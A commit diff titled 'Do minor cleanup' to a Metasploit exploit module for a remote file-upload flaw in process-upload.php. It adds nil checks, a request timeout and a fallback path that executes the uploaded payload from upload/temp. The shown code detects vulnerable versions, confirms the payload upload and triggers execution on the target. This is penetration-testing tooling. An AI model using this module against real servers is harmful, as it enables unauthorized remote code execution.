Do minor cleanup
parent
5c82b8a827
commit
b5b0be9001
|
@ -67,20 +67,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
elsif res.code.to_i == 500
|
||||
vprint_error("#{peer} - Unable to write file")
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif res.code.to_i == 200 && res.body =~ /<\?php/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
|
||||
vprint_error("#{peer} - File process-upload.php is not executable")
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/
|
||||
vprint_error("#{peer} - Software is misconfigured")
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif res.code.to_i == 200 && res.body =~ /jsonrpc/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/
|
||||
# response on revision 118 onwards includes the file name
|
||||
if res.body =~ /NewFileName/
|
||||
if res.body && res.body =~ /NewFileName/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
# response on revisions 100 to 117 does not include the file name
|
||||
elsif res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
|
||||
elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
|
||||
return Exploit::CheckCode::Appears
|
||||
elsif res.body =~ /Failed to open output stream/
|
||||
elsif res.body && res.body =~ /Failed to open output stream/
|
||||
vprint_error("#{peer} - Upload folder is not writable")
|
||||
return Exploit::CheckCode::Safe
|
||||
else
|
||||
|
@ -113,14 +113,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
|
||||
elsif res.code.to_i == 500
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
|
||||
elsif res.code.to_i == 200 && res.body =~ /Failed to open output stream/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
|
||||
elsif res.code.to_i == 200 && res.body =~ /<\?php/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
|
||||
elsif res.code.to_i == 200 && res.body =~ /sys.config.php/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
|
||||
# response on revision 118 onwards includes the file name
|
||||
elsif res.code.to_i == 200 && res.body =~ /NewFileName/
|
||||
elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/
|
||||
print_good("#{peer} - Payload uploaded successfully (#{fname})")
|
||||
return fname
|
||||
# response on revisions 100 to 117 does not include the file name
|
||||
|
@ -139,10 +139,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exec(upload_path)
|
||||
print_status("#{peer} - Executing #{upload_path}...")
|
||||
res = send_request_raw(
|
||||
'uri' => normalize_uri(target_uri.path, upload_path)
|
||||
{ 'uri' => normalize_uri(target_uri.path, upload_path) }, 5
|
||||
)
|
||||
if !res
|
||||
print_error("#{peer} - Request timed out while executing")
|
||||
print_status("#{peer} - Request timed out while executing")
|
||||
elsif res.code.to_i == 404
|
||||
vprint_error("#{peer} - Not found: #{upload_path}")
|
||||
elsif res.code.to_i == 200
|
||||
|
@ -159,6 +159,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fname = upload
|
||||
register_files_for_cleanup(fname)
|
||||
exec("upload/files/#{fname}") # default for r-221 onwards
|
||||
unless session_created?
|
||||
exec("upload/temp/#{fname}") # default for r-100 to r-219
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue